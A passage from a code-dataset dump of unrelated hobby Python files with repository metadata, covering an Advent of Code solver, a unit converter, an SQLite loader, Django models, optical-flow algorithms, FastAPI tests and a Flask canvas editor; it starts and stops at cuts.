rule_match.group(\"rule\").split(\"|\")\n ]\n rules[rule_match.group(\"index\")] = Rule(base, sub_rules)\n else:\n messages.append(l.strip())\n return rules, messages\n\n\n# OK Part 2 - so 0 is made from 8 11, 8 is an arbitrary number of 42s,\n# 11 is N 42s followed by N 31s, where N is some integer. 42s and 31s are\n# strings of length 8. That means to find the messages that match 0, they must\n# start with 2 42s, then each 8 bytes further must match either a 42 or a 31\n# (if a 42, then next 8 chars can match a 42 or a 31, but after a 31, next 8\n# chars can only match a 31). finally, the last 8 chars need to be in the 31\n# set. There also have to be more 42s than 31s by the pattern\ndef apply_part2_to_message(message, rules):\n # print(f\"Message: {message}\")\n rule42_set = set(rules[\"42\"].rule_set)\n rule31_set = set(rules[\"31\"].rule_set)\n\n length = len(rules[\"42\"].rule_set[0])\n if (len(message) % length != 0) or (len(message) < (3 * length)):\n # print(f\"Message too short: {len(message)}\")\n return False\n\n if message[0:length] not in rule42_set:\n # print(f\"First {length} chars don't match rule42: {message[0:length]}\")\n return False\n\n if message[length : (2 * length)] not in rule42_set:\n # print(f\"Second {length} chars don't match rule42: {message[length:2*length]}\")\n return False\n\n if message[-length:] not in rule31_set:\n # print(f\"Last {length} chars don't match rule31: {message[-length:]}\")\n return False\n\n count31 = 0\n count42 = 2\n\n i = 2 * length\n hit_31s = False\n while (i + length) <= len(message):\n # print(f\"i = {i} checking: {message[i:i+length]}\")\n if not hit_31s:\n # print(f\"Not hit 31s yet\")\n if message[i : i + length] not in rule42_set:\n # print(f\"Not in rule 42 set\")\n if message[i : i + length] not in rule31_set:\n # print(f\"Not in rule 31 set\")\n return False\n else:\n # print(f\"In rule 31 set\")\n count31 += 1\n hit_31s = True\n else:\n count42 += 1\n else:\n # print(f\"On the 31s\")\n if message[i : i + length] not in rule31_set:\n # print(f\"Not in rule 31 set (2)\")\n return False\n count31 += 1\n i += length\n\n if count42 > count31:\n # print(f\"Message checks out\")\n return True\n # else:\n # print(f\"Too many 31s - impossible pattern: {count31} 31s vs {count42} 42s\")\n\n\nrules, messages = read_file(FILE)\n# print(f\"Rules: {rules}\")\n# print(f\"Messages: {messages}\")\n\n# Finish initialization of the rules\nfor rule in rules.values():\n rule.construct_alternatives(rules)\n\ncount = 0\nfor message in messages:\n if rules[\"0\"].apply_rule_to_message(message):\n count += 1\nprint(f\"Part 1 count: {count}\")\n\n# print(f\"Rule 8 expanded: length {len(rules['8'].rule_set)}: {rules['8'].rule_set[:20]}\")\n# print(f\"Rule 8 contributing rules: {rules['8'].contributing_rules}\")\n# print(f\"Rule 11 expanded: length {len(rules['11'].rule_set)}: {rules['11'].rule_set[:20]}\")\n# print(f\"Rule 11 contributing rules: {rules['11'].contributing_rules}\")\n# print(f\"Rule 31 expanded: length {len(rules['31'].rule_set)}: {rules['31'].rule_set}\")\n# print(f\"Rule 31 contributing rules: {rules['31'].contributing_rules}\")\n# print(f\"Rule 42 expanded: length {len(rules['42'].rule_set)}: {rules['42'].rule_set}\")\n# print(f\"Rule 42 contributing rules: {rules['42'].contributing_rules}\")\n# print(f\"Rule 0 expanded: length {len(rules['0'].rule_set)}: {rules['0'].rule_set[:20]}\")\n# print(f\"Rule 0 contributing rules: {rules['0'].contributing_rules}\")\n# print(f\"Max message len: {max([len(x) for x in messages])}\")\nstart = default_timer()\ncount2 = 0\nfor message in messages:\n if apply_part2_to_message(message, rules):\n count2 += 1\nstop = default_timer()\nprint(f\"Part 2 count: {count2}\")\nprint(f\"Part 2 took: {stop-start}\")\n","repo_name":"mikeramage/aoc2020","sub_path":"python/day19/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2699763006","text":"from os.path import basename\n\nfrom abc import ABC, abstractmethod\n\n# Classe Adaptateur.\n# Adaptateur entre le RSV (Middleware) et les exports.\n# Objectif, traiter les rapports et transmettre les données sous un format \n# standardisé vers le RSV.\nclass Adaptateur(ABC):\n\n #############################################################################\n ######################## Variables Statiques ########################\n #############################################################################\n \n FORMAT_DATE_HEURE = \"%Y-%m-%d %H:%M:%S\"\n TRAITEMENT_PREFIX = \"traite_\"\n TRAITEMENT_SUFIX = \"\"\n\n SOURCE_ORADAD = \"Oradad\"\n SOURCE_CSV = \"CSV\"\n SOURCE_DB = \"DB\"\n SOURCE_CONFIG = \"config\"\n SOURCE_CASSIS = \"CASSIS\"\n \n \n \n \n #############################################################################\n ########################## Private methods ##########################\n #############################################################################\n \n \n \n # Constructeur\n def __init__(self, adaptateur_CSV):\n print(\"Adaptateur - Init - Begin\")\n \n self.adaptateur_CSV = adaptateur_CSV\n \n print(\"Adaptateur - Init - End\")\n \n \n \n # Ouvre un fichier (rapport).\n # (Si erreur) Retourne -1 ;\n # (Sinon) Retourne le fichier ouvert.\n def __open_file__(self, path, mode):\n \n try:\n print(\"Opening file \" + path + \"...\")\n open_file = open(path, mode)\n \n except:\n raise Exception(\"Error while opening file \" + path)\n else:\n print(\"File \" + path + \" opened.\")\n return open_file\n \n \n \n # Ferme un fichier (rapport).\n # (Si erreur) Retourne -1 ;\n # (Sinon) Retourne 0.\n def __close_file__(self, open_file):\n \n try:\n print(\"Closing file \" + open_file.name + \"...\")\n open_file.close()\n \n except:\n raise Exception(\"Error while closing file \" + open_file.name)\n \n else:\n print(\"File \" + open_file.name +\" closed.\")\n \n \n \n # Obtient le nom du fichier à partir de son chemin complet.\n def __get_path_basename__(self, path):\n return basename(path)\n \n \n \n \n \n \n \n # Trouve l'index du debut du bloc et celui de la fin du bloc\n # retourne index_debut_bloc, index_fin_bloc\n # Renvoi -1 si erreur\n def __trouve_debut_fin_bloc__(self, \n texte, \n delemiteur_bloc_begin, \n delemiteur_bloc_end, \n index_debut=0, \n index_fin=-1\n ):\n \n \n if index_fin < 0: index_fin = len(texte)\n \n index_debut_bloc = 0\n index_fin_bloc = 0\n \n compteur_ouverture_bloc = 0\n index = index_debut\n \n \n \n while index < index_fin:\n if texte[index] == delemiteur_bloc_begin:\n compteur_ouverture_bloc = 1\n index_debut_bloc = index\n break\n else:\n # Avance l'index tampon\n index = index + 1\n \n \n \n \n # Tant que des blocs sont ouverts\n while compteur_ouverture_bloc > 0 and index < index_fin:\n \n # Avance l'index tampon\n index = index + 1\n \n if texte[index] == delemiteur_bloc_begin:\n compteur_ouverture_bloc = compteur_ouverture_bloc + 1\n elif texte[index] == delemiteur_bloc_end:\n compteur_ouverture_bloc = compteur_ouverture_bloc - 1\n \n if index >= index_fin: index_fin_bloc = -1\n \n index_fin_bloc = index + 1\n \n return index_debut_bloc, index_fin_bloc\n \n \n \n def __trouve_debut_fin_bloc_find__(self, \n texte, \n delemiteur_bloc_begin, \n delemiteur_bloc_end, \n index_debut=0, \n index_fin=-1\n ):\n \n \n if index_fin < 0: index_fin = len(texte)\n \n index_debut_bloc = -1\n index_fin_bloc = -1\n \n compteur_ouverture_bloc = 0\n \n \n index = texte.find(\n delemiteur_bloc_begin, \n index_debut, \n index_fin\n )\n \n index_debut_bloc = index\n \n if index >= 0:\n compteur_ouverture_bloc = 1\n \n \n \n \n index_debut_find = texte.find(\n delemiteur_bloc_begin, \n index + len(delemiteur_bloc_begin), \n index_fin\n )\n \n index_fin_find = texte.find(\n delemiteur_bloc_end, \n index + len(delemiteur_bloc_begin), \n index_fin\n )\n \n if index_fin_find < 0: \n index_fin_bloc = -1\n return index_debut_bloc, index_fin_bloc\n \n \n \n \n # Tant que des blocs sont ouverts\n while compteur_ouverture_bloc > 0 and index_debut_find >= 0:\n \n index_fin_bloc = index_fin_find\n \n if index_fin_find < 0: \n index_fin_bloc = -1\n return index_debut_bloc, index_fin_bloc\n \n \n \n if index_debut_find >= 0 and index_debut_find < index_fin_find:\n compteur_ouverture_bloc = compteur_ouverture_bloc + 1\n index_debut_find = index_debut_find + len(delemiteur_bloc_begin)\n elif index_fin_find >= 0:\n compteur_ouverture_bloc = compteur_ouverture_bloc - 1\n index_debut_find = index_fin_find + len(delemiteur_bloc_end)\n \n \n if compteur_ouverture_bloc == 0:\n index_fin_bloc = index_fin_find\n return index_debut_bloc, index_fin_bloc\n \n index_debut_find = texte.find(\n delemiteur_bloc_begin, \n index_debut_find, \n index_fin\n )\n \n index_fin_find = texte.find(\n delemiteur_bloc_end, \n index_debut_find, \n index_fin\n )\n \n return index_debut_bloc, index_fin_bloc\n \n \n \n \n \n #############################################################################\n ########################## Public methods ##########################\n #############################################################################\n \n # Méthode abstraite.\n # Traite les rapports pour transmettre les données sous un fomat standardisé \n # vers le RSV.\n @abstractmethod\n def traitement_fichier(self):\n pass\n \n \n","repo_name":"get-me-a-cookie/SSI_Pomme","sub_path":"adaptateur/adaptateur.py","file_name":"adaptateur.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5739441487","text":"from time import time\n\n\ndef measure_time(fn):\n def wrapper(*args, **kwargs):\n start = time()\n result = fn(*args, **kwargs)\n end = time()\n print(end - start)\n\n return result\n return wrapper\n\n\n@measure_time\ndef sum_number_to(to_number):\n result = 0\n for n in range(to_number):\n result += n\n return result\n\nsum_number_to(1000000)","repo_name":"dimobs/pythonProject2023","sub_path":"Decorators/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31184237404","text":"print(\"\\n\\nWELCOME TO YOUR UNIT CONVERTER\\n\")\n\n\ndef main():\n def units():\n unit = input(\n \"choose an option please \\n\\n\"\n \"1. cm to inch \\n\"\n \"2. inch to cm \\n\"\n \"3. m to feet \\n\"\n \"4. feet to m \\n\"\n \"5. km to mile \\n\"\n \"6. mile to km \\n\"\n \"7. kg to pound \\n\"\n \"8. pound to kg \\n\"\n \"9. Celsius to Fahrenheit \\n\"\n \"10. Fahrenheit to Celsius \\n\"\n \"11. Celsius to Kelvin \\n\"\n \"12. Kelvin to Celsius \\n\"\n \"13. Fahrenheit to Kelvin \\n\"\n \"14. Kelvin to Fahrenheit \\n\\n\"\n \"your option: \"\n )\n while unit not in (\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\"):\n print(\"Wrong choice, please choose again\\n\")\n units()\n\n number = float(input(\"enter the value you want to convert: \"))\n\n if unit == \"1\":\n print(number / 2.54, \"in\")\n elif unit == \"2\":\n print(number * 2.54, \"cm\")\n elif unit == \"3\":\n print(number * 3.281, \"ft\")\n elif unit == \"4\":\n print(number / 3.281, \"m\")\n elif unit == \"5\":\n print(number / 1.609, \"mile\")\n elif unit == \"6\":\n print(number * 1.609, \"km\")\n elif unit == \"7\":\n print(number * 2.20462, \"lb\")\n elif unit == \"8\":\n print(number / 2.20462, \"kg\")\n elif unit == \"9\":\n print((number * 9 / 5) + 32, \"F\")\n elif unit == \"10\":\n print((number - 32) * 5 / 9, \"C\")\n elif unit == \"11\":\n print(number + 273.15, \"K\")\n elif unit == \"12\":\n print(number - 273.15, \"C\")\n elif unit == \"13\":\n print((number - 32) * 5 / 9 + 273.15, \"K\")\n elif unit == \"14\":\n print(((number - 273.15) * 9 / 5) + 32, \"F\")\n\n restart = input(\"Do you want to start again? y / n: \")\n if restart == \"y\":\n main()\n elif restart == \"n\":\n exit()\n units()\nmain()\n","repo_name":"RubarMo/unit-converter","sub_path":"Unit Converter.py","file_name":"Unit Converter.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"31919825980","text":"import sqlite3\nimport os\n\n\ndef sanitize_table_name(table_name):\n \"\"\"\n Sanitize a table name by replacing all characters that are not alphanumeric\n or underscores with underscores.\n\n Args:\n table_name (str): The table name to sanitize.\n\n Returns:\n str: The sanitized table name.\n \"\"\"\n sanitized_name = \"\"\n for char in table_name:\n if char.isalnum() or char == \"_\":\n sanitized_name += char\n else:\n sanitized_name += \"_\"\n\n # Ensure the resulting name starts with an alphabetic character\n if not sanitized_name[0].isalpha():\n sanitized_name = \"table_\" + sanitized_name\n\n return sanitized_name\n\n\ndef load_db_data(data_file_path, table_name):\n \"\"\"\n Load data from an SQLite database table into a list of dictionaries.\n\n Args:\n data_file_path (str): The path to the SQLite database file.\n table_name (str): The name of the table from which data will be loaded.\n\n Returns:\n list:\n A list of dictionaries where each dictionary represents a row of\n data.\n The keys in each dictionary correspond to the column names, and the\n values are the column values for that row.\n\n Raises:\n FileNotFoundError:\n If the SQLite file specified by data_file_path does not exist.\n sqlite3.OperationalError:\n If there is an issue with SQLite database operations.\n\n Example:\n data = load_db_data(\"my_database.db\", \"my_table\")\n \"\"\"\n\n # Check if the SQLite file exists\n if not os.path.exists(data_file_path):\n raise FileNotFoundError(\n f\"SQLite file '{data_file_path}' does not exist.\"\n )\n\n # Connect to the SQLite database\n conn = sqlite3.connect(data_file_path)\n cursor = conn.cursor()\n\n # Sanitize the table_name before using it in the query\n table_name = sanitize_table_name(table_name)\n\n # Fetch column names from the table\n cursor.execute(f\"PRAGMA table_info({table_name})\")\n columns = [column[1] for column in cursor.fetchall()]\n\n # Sanitize the table_name before using it in the query\n table_name = sanitize_table_name(table_name)\n\n # Use string formatting to construct the query\n\n query = f\"SELECT * FROM {table_name}\"\n cursor.execute(query)\n rows = cursor.fetchall()\n\n # Create a list of dictionaries with column names as keys\n data = []\n for row in rows:\n row_dict = {}\n for i, value in enumerate(row):\n row_dict[columns[i]] = value\n data.append(row_dict)\n\n # Close the connection to the SQLite database\n conn.close()\n\n return data\n","repo_name":"sebastienrousseau/pain001","sub_path":"pain001/db/load_db_data.py","file_name":"load_db_data.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"15605352733","text":"from django.db import models\nfrom user.models import User\n# Create your models here.\n\nclass Post(models.Model):\n class Meta:\n db_table = 'post'\n\n id = models.AutoField(primary_key=True)\n title = models.CharField(max_length=200,null=True)\n postdate = models.DateTimeField(null=True)\n # 从POST查作者,从post查内容\n author = models.ForeignKey(User, on_delete=models.PROTECT) #指定外键,migrate会生成author_id字段\n # self.content可以访问content实例,其内容是self.content.content\n\n def __repr__(self):\n return \"\".format(\n self.id,self.title,self.author,self.content)\n __str__ = __repr__\n\nclass Content(models.Model):\n class Meta:\n db_table = 'content'\n # 没有主键,会自动创建一个自增主键\n post = models.OneToOneField(Post,primary_key=True,on_delete=models.PROTECT) # 一对一,这边会有一个外键post_id引用post_id\n content = models.TextField(null=False)\n def __repr__(self):\n return \"\".format(\n self.pk,self.content[:20]\n )\n\n __str__ = __repr__","repo_name":"mghxy123/learnPython","sub_path":"web开发/django/blog/post/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41926348908","text":"import os\n\nimport numpy as np\nimport cv2 as cv\n\n\ndef load_FLO_file(filename):\n assert os.path.isfile(filename), 'file does not exist: ' + filename\n flo_file = open(filename, 'rb')\n magic = np.fromfile(flo_file, np.float32, count=1)\n assert magic == 202021.25, 'Magic number incorrect. .flo file is invalid'\n w = np.fromfile(flo_file, np.int32, count=1)\n h = np.fromfile(flo_file, np.int32, count=1)\n data = np.fromfile(flo_file, np.float32, count=2 * w[0] * h[0])\n flow = np.resize(data, (int(h[0]), int(w[0]), 2))\n flo_file.close()\n return flow\n\n\nclass OpticalFlow:\n def __init__(self):\n # Parameters for Lucas_Kanade_flow()\n self.EIGEN_THRESHOLD = 0.01 # use as threshold for determining if the optical flow is valid when performing Lucas-Kanade\n self.WINDOW_SIZE = [25, 25] # the number of points taken in the neighborhood of each pixel\n\n # Parameters for Horn_Schunck_flow()\n self.EPSILON = 0.002 # the stopping criterion for the difference when performing the Horn-Schuck algorithm\n self.MAX_ITERS = 1000 # maximum number of iterations allowed until convergence of the Horn-Schuck algorithm\n self.ALPHA = 1.0 # smoothness term\n\n # Parameter for flow_map_to_bgr()\n self.UNKNOWN_FLOW_THRESH = 1000\n\n self.prev = None\n self.next = None\n\n def next_frame(self, img):\n self.prev = self.next\n self.next = img\n\n if self.prev is None:\n return False\n\n frames = np.float32(np.array([self.prev, self.next]))\n frames /= 255.0\n\n # calculate image gradient\n self.Ix = cv.Sobel(frames[0], cv.CV_32F, 1, 0, 3)\n self.Iy = cv.Sobel(frames[0], cv.CV_32F, 0, 1, 3)\n self.It = frames[1] - frames[0]\n\n return True\n\n # ***********************************************************************************\n\n # implement Lucas-Kanade Optical Flow\n # returns the Optical flow based on the Lucas-Kanade algorithm and visualisation result\n def Lucas_Kanade_flow(self):\n image = self.prev\n w1 = self.WINDOW_SIZE[0] // 2\n w2 = self.WINDOW_SIZE[1] // 2\n flow = np.zeros((image.shape[0], image.shape[1], 2))\n for i in range(w1, image.shape[0] - w1):\n for j in range(w2, image.shape[1] - w2):\n ix = self.Ix[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n iy = self.Iy[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n it = self.It[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n A = np.vstack((ix, iy)).T\n M = A.T @ A\n if np.min(abs(np.linalg.eigvals(M))) >= self.EIGEN_THRESHOLD:\n b = np.reshape(it, (it.shape[0], 1))\n d = np.linalg.inv(M) @ A.T @ b\n flow[i, j, 0] = d[0]\n flow[i, j, 1] = d[1]\n\n flow_bgr = self.flow_map_to_bgr(flow)\n return flow, flow_bgr\n\n # ***********************************************************************************\n # implement Horn-Schunck Optical Flow \n # returns the Optical flow based on the Horn-Schunck algorithm and visualisation result\n def Horn_Schunck_flow(self):\n image = self.prev\n w1 = self.WINDOW_SIZE[0] // 2\n w2 = self.WINDOW_SIZE[1] // 2\n flow = np.zeros((image.shape[0], image.shape[1], 2))\n\n n_iterations = 0\n while True:\n flow_prev = flow.copy()\n\n u_bar = flow[:, :, 0] + cv.Laplacian(flow[:, :, 0], cv.CV_64F) / 4\n v_bar = flow[:, :, 1] + cv.Laplacian(flow[:, :, 1], cv.CV_64F) / 4\n\n flow[:, :, 0] = u_bar - self.Ix * (self.Ix * u_bar + self.Iy * v_bar + self.It) / \\\n (1 + self.Ix ** 2 + self.Iy ** 2)\n flow[:, :, 1] = v_bar - self.Iy * (self.Ix * u_bar + self.Iy * v_bar + self.It) / \\\n (1 + self.Ix ** 2 + self.Iy ** 2)\n\n # termination condition\n flow_difference = flow - flow_prev\n metric = np.abs(np.sum(flow_difference[:, :, 0])) + np.abs(np.sum(flow_difference[:, :, 1]))\n\n n_iterations += 1\n\n # metric is set to 2 instead of 0.002 to speed up the computation\n if metric < 2:\n break\n\n flow_bgr = self.flow_map_to_bgr(flow)\n return flow, flow_bgr\n\n # ***********************************************************************************\n # calculate the angular error here\n # return average angular error and per point error map\n def calculate_angular_error(self, estimated_flow, groundtruth_flow):\n aae_per_point = np.zeros(self.prev.shape)\n for i in range(self.prev.shape[0]):\n for j in range(self.prev.shape[1]):\n aae_per_point[i, j] = np.arccos((groundtruth_flow[i, j, 0] * estimated_flow[i, j, 0] + groundtruth_flow[\n i, j, 1] * estimated_flow[i, j, 1] + 1) /\n np.sqrt((groundtruth_flow[i, j, 0] ** 2 + groundtruth_flow[\n i, j, 1] ** 2 + 1) * (estimated_flow[i, j, 0] ** 2 + estimated_flow[\n i, j, 1] ** 2 + 1)))\n aae = np.average(aae_per_point)\n return aae, aae_per_point\n\n # ***********************************************************************************\n # calculate the endpoint error here\n # return average endpoint error and per point error map\n def calculate_endpoint_error(self, estimated_flow, groundtruth_flow):\n aee_per_point = np.zeros(self.prev.shape)\n for i in range(self.prev.shape[0]):\n for j in range(self.prev.shape[1]):\n aee_per_point[i, j] = (groundtruth_flow[i, j, 0] - estimated_flow[i, j, 0]) ** 2 + (\n groundtruth_flow[i, j, 1] - estimated_flow[i, j, 1]) ** 2\n aee = np.average(aee_per_point)\n return aee, aee_per_point\n\n # ***********************************************************************************\n # function for converting flow map to to BGR image for visualisation\n # return bgr image\n def flow_map_to_bgr(self, flow):\n hsv = np.zeros([self.prev.shape[0], self.prev.shape[1], 3])\n hsv[..., 1] = 255\n\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n flow_bgr = cv.cvtColor(hsv.astype('uint8'), cv.COLOR_HSV2BGR)\n\n return flow_bgr\n\n\ndef visualize_flow(title, flow):\n cv.imshow(title, flow)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n\n data_list = [\n 'data/frame_0001.png',\n 'data/frame_0002.png',\n 'data/frame_0007.png',\n ]\n\n gt_list = [\n './data/frame_0001.flo',\n './data/frame_0002.flo',\n './data/frame_0007.flo',\n ]\n\n Op = OpticalFlow()\n\n for (i, (frame_filename, gt_filemane)) in enumerate(zip(data_list, gt_list)):\n groundtruth_flow = load_FLO_file(gt_filemane)\n img = cv.cvtColor(cv.imread(frame_filename), cv.COLOR_BGR2GRAY)\n if not Op.next_frame(img):\n continue\n\n flow_lucas_kanade, flow_lucas_kanade_bgr = Op.Lucas_Kanade_flow()\n aae_lucas_kanade, aae_lucas_kanade_per_point = Op.calculate_angular_error(flow_lucas_kanade, groundtruth_flow)\n aee_lucas_kanade, aee_lucas_kanade_per_point = Op.calculate_endpoint_error(flow_lucas_kanade, groundtruth_flow)\n\n flow_horn_schunck, flow_horn_schunck_bgr = Op.Horn_Schunck_flow()\n aae_horn_schunk, aae_horn_schunk_per_point = Op.calculate_angular_error(flow_horn_schunck, groundtruth_flow)\n aee_horn_schunk, aee_horn_schunk_per_point = Op.calculate_endpoint_error(flow_horn_schunck, groundtruth_flow)\n\n flow_bgr_gt = Op.flow_map_to_bgr(groundtruth_flow)\n\n # Implement vizualization below \n # Your functions here\n\n visualize_flow('ground_truth', flow_bgr_gt)\n visualize_flow('lucas_kanade', flow_lucas_kanade_bgr)\n visualize_flow('horn_schunck', flow_horn_schunck_bgr)\n\n # Collect and display all the numerical results from all the runs in tabular form (the exact formating is up to your choice)\n print(f\"\"\"\n {\"*\" * 20}\n frame {i}\n \n Lukas_Kanade:\n average angular error: {aae_lucas_kanade}\n average endpoint error: {aee_lucas_kanade}\n \n Horn-Schunck:\n average angular error: {aae_horn_schunk}\n average endpoint error: {aee_horn_schunk}\n \n \"\"\")\n","repo_name":"AlekseiZhuravlev/Assignments-MSc","sub_path":"2201_Computer_vision/09_OpticalFlow/sheet09.py","file_name":"sheet09.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30720285040","text":"#Criar a estrutura de uma patricia para armazenar as vogais\nclass no:\n #Inicializando os campos do nó\n def __init__(self,chave=None):\n self.chave = chave\n self.marcador = 0\n self.filhos = {\n 'a': None,\n 'e': None,\n 'i': None,\n 'o': None,\n 'u': None\n }\n\n #Imprimindo os campos do nó \n def __str__(self): \n return 'No('+str(self.chave)+')'\n\n def inserir(self, palavra: str):\n primeira_letra = palavra[0]\n n = no(palavra)\n self.filhos.update({primeira_letra : n})\n\n return self.filhos[primeira_letra]\n\nraiz = no()\nlinha1 = raiz.inserir('al')\nlinha2 = linha1.inserir('egria')\nlinha2 = linha1.inserir('ugar')","repo_name":"PedroWC/exerciciosPython","sub_path":"ED/patricia/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73893815793","text":"from fastapi import UploadFile, File\r\nfrom fastapi.testclient import TestClient\r\nimport os\r\nimport io\r\n\r\nfrom starlette.routing import BaseRoute\r\nfrom ..main import app\r\n\r\nfrom ..routers.problems import Answer, router\r\nfrom .util import replace_floats\r\n\r\n\"\"\"\r\ndef test_no_file(path: str):\r\n with TestClient(app) as client:\r\n response = client.post(path)\r\n assert response.status_code == 422 \r\n return\r\n\r\ndef test_empty_file(path: str):\r\n with TestClient(app) as client:\r\n file = io.StringIO(\"xyz\")\r\n files = {\"file\": file}\r\n response = client.post(path, files=files)\r\n assert response.status_code == 500\r\n\"\"\"\r\ndef test_docs(path: str):\r\n r = [r for r in app.routes if r.path == path]\r\n route = r[0]\r\n assert route is not None\r\n assert hasattr(route, \"description\")\r\n assert hasattr(route, \"path\")\r\n if hasattr(route, \"description\") and hasattr(route, \"path\"):\r\n description: str = route.description\r\n splits = description.split(\"```\")\r\n \r\n if len(splits) <= 2:\r\n print(f\"{path} not implemented\")\r\n return\r\n if len(splits) > 2:\r\n dataset = splits[1].strip()\r\n output = splits[3].strip()\r\n file = io.StringIO(dataset)\r\n files = { 'file': file }\r\n with TestClient(app) as client:\r\n response = client.post(path, files=files)\r\n assert response.status_code == 200\r\n json = response.json()\r\n if \"answer\" not in json:\r\n assert json[\"error\"] == \"not implemented\"\r\n return\r\n assert \"answer\" in json\r\n if json[\"answer\"] == \"\":\r\n print(f\"{path} not implemented\")\r\n return\r\n replaced = replace_floats(str(json['answer']))\r\n r_output = replace_floats(output)\r\n assert replaced == r_output\r\n\r\n\r\n\r\ndef test_datasets(file_prefix: str):\r\n with TestClient(app) as client:\r\n data_folder = os.path.join(os.path.dirname(__file__), \"data\")\r\n f = os.path.join(data_folder, f\"rosalind_{file_prefix}_dataset.txt\")\r\n out = os.path.join(data_folder, f\"rosalind_{file_prefix}_output.txt\")\r\n name = file_prefix.split(\"_\")[0]\r\n url = f\"/problems/{name.upper()}\"\r\n with open(f, 'rb') as tmp:\r\n files = {'file': tmp}\r\n response = client.post(url, files=files)\r\n assert response.status_code == 200\r\n json = response.json()\r\n if \"answer\" not in json:\r\n assert json[\"error\"] == \"not implemented\"\r\n return\r\n assert \"answer\" in json\r\n with open(out, \"r\") as out_file:\r\n replaced = replace_floats(str(json[\"answer\"]))\r\n replaced_output = replace_floats(out_file.read())\r\n assert replaced == replaced_output\r\n","repo_name":"boonepeter/franklin-api","sub_path":"app/tests/test_endpoints.py","file_name":"test_endpoints.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18835184535","text":"#!/home/jack/Desktop/FlaskAppArchitect_Flask_App_Creator/env/bin/python\nfrom flask import Flask, render_template, redirect, url_for, request, session\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport os\nimport datetime\nimport random\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n# Create a logger object\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n# Create a formatter for the log messages\nformatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n\n# Create a file handler to write log messages to a file\nfile_handler = RotatingFileHandler('Logs/CANVAS.log', maxBytes=10000, backupCount=1)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\n\n# Add the file handler to the logger\nlogger.addHandler(file_handler)\n\n# Define paths and directories\ncanvas_dir = 'static/canvas'\noriginal_canvas_dir = os.path.join(canvas_dir, 'original')\nos.makedirs(original_canvas_dir, exist_ok=True)\n@app.route('/hello_world')\ndef hello_world():\n TExt = \"TEXT TEST 6789\"\n logger.debug('This is a debug message: %s', TExt)\n\n TEXT = \"TEXT TEST abcd\"\n logger.debug('This is a debug message: %s', TEXT)\n\n return \"Hello, World!\"\n\ndef findvideos():\n videoroot_directory = \"static\"\n MP4 = []\n for dirpath, dirnames, filenames in os.walk(videoroot_directory):\n for filename in filenames:\n if filename.endswith(\".mp4\") and \"Final\" in filename:\n MP4.append(os.path.join(dirpath, filename))\n if MP4:\n last_video = session.get(\"last_video\")\n new_video = random.choice([video for video in MP4 if video != last_video])\n session[\"last_video\"] = new_video\n return new_video\n else:\n return None\n\n\n\n# Function to load the original canvas file\ndef load_original_canvas_file(filename):\n original_file_path = os.path.join(canvas_dir, filename)\n with open(original_file_path, 'r') as file:\n logger.debug(\"original_file_path:\",original_file_path)\n return file.read()\n\n# Function to save the original canvas file with a timestamp\ndef save_original_canvas_file(filename, content):\n now = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n new_filename = f\"{filename}_{now}canvas.js\"\n new_file_path = os.path.join(original_canvas_dir, new_filename)\n with open(new_file_path, 'w') as file:\n file.write(content)\n\n# Function to edit and save the canvas file\ndef edit_and_save_canvas_file(filename, content):\n save_original_canvas_file(filename, content)\n logger.debug(\"filename:\",filename)\n logger.debug(\"content:\",content)\n edited_file_path = os.path.join(canvas_dir, filename)\n with open(edited_file_path, 'w') as file:\n file.write(content)\n\n@app.route('/')\ndef index():\n return redirect(url_for('edit_canvas'))\n\n@app.route('/edit_canvas')\ndef edit_canvas():\n filenames = [f for f in os.listdir(canvas_dir) if f.endswith('canvas.js')]\n filenames = sorted(filenames)\n logger.debug(\"FILENAMES:\",filenames)\n fvideo = findvideos() # Assuming findvideos() is defined elsewhere\n logger.debug(\"FVIDEO:\",fvideo)\n return render_template('edit_canvas.html', filenames=filenames, video=fvideo)\n\n@app.route('/edit_canvas_page')\ndef edit_canvas_page():\n selected_filename = request.args.get('filename')\n logger.debug(\"selected_filename:\",selected_filename)\n original_content = load_original_canvas_file(selected_filename)\n logger.debug(\"original_content:\",original_content)\n return render_template('edit_canvas_page.html', selected_filename=selected_filename, original_content=original_content)\n\n@app.route('/edit_canvas_save', methods=['POST'])\ndef 